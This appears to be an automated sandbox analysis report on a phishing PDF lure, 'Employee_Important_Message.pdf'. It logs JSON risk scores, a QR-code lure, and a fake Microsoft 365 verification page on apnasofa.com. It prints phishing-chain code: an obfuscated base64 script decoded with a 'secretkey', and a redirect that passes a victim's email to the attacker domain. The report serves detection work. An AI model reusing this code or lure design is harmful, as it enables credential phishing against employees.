Windows Analysis Report
Employee_Important_Message.pdf

{
    "contains_trigger_text": true,
    "trigger_text": "Important: Employee Action Required",
    "prominent_button_name": "Scan Here:",
    "text_input_field_labels": "unknown",
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": true,
    "has_visible_qrcode": true,
    "contains_chinese_text": false
}

{
    "risk_score": 8,
    "reasoning": "Script contains heavily obfuscated code (base64 encoded) with 'secretkey' variable (+3), uses atob for decoding (+1), likely contains hidden functionality (+2), and the presence of a hardcoded 'secretkey' suggests potential data exfiltration or malicious intent (+2). The obfuscation technique combined with sensitive key handling indicates deliberate attempt to hide functionality."
}

var key = "secretkey";
var script = atob("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

{
  "brands": [
    "Hollandco"
  ]
}

{
    "risk_score": 5,
    "reasoning": "Script performs URL redirection (+2) to a non-standard domain with parameter passing (+2). While the code itself is simple, passing encoded parameters via URL hash to an external domain (+1) could potentially be used for data exfiltration. The domain 'apnasofa.com' isn't a widely recognized trusted source. However, the code isn't obfuscated and doesn't use eval or other high-risk functions."
}

        // Get the encoded email parameter from the URL hash
        var emailEncoded = window.location.hash.substring(1); // Remove the first character '#'

        // Redirect to the specified URL with the encoded email parameter
        window.location.href = "https://apnasofa.com/episode/index#" + emailEncoded;
    

{
  "contains_trigger_text": true,
  "trigger_text": "We need to verify it's you",
  "prominent_button_name": "Verify",
  "text_input_field_labels": [
    "Enter your email address"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false
}

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": false
}

URL: https://apnasofa.com

{
  "brands": [
    "Microsoft 365"
  ]
}

{
  "contains_trigger_text": true,
  "trigger_text": "We need to verify it's you",
  "prominent_button_name": "Verify",
  "text_input_field_labels": [
    "mograd"
  ],
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false
}

{
  "brands": [
    "Microsoft 365"
  ]
}

{
    "contains_trigger_text": true,
    "trigger_text": "We need to verify it's you",
    "prominent_button_name": "Verify",
    "text_input_field_labels": [
        "mogrady"
    ],
    "pdf_icon_visible": false,
    "has_visible_captcha": false,
    "has_urgent_text": false,
    "has_visible_qrcode": false,
    "contains_chinese_text": false
}

{
  "brands": [
    "Microsoft 365"
  ]
}

```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft 365' is well-known and typically associated with the domain 'microsoft.com'.",    "The URL 'apnasofa.com' does not match the legitimate domain for Microsoft 365.",    "The domain 'apnasofa.com' does not have any known association with Microsoft or its services.",    "The presence of an input field asking for an email address on a non-Microsoft domain is suspicious and indicative of phishing."  ],  "riskscore": 9}
Google indexed: True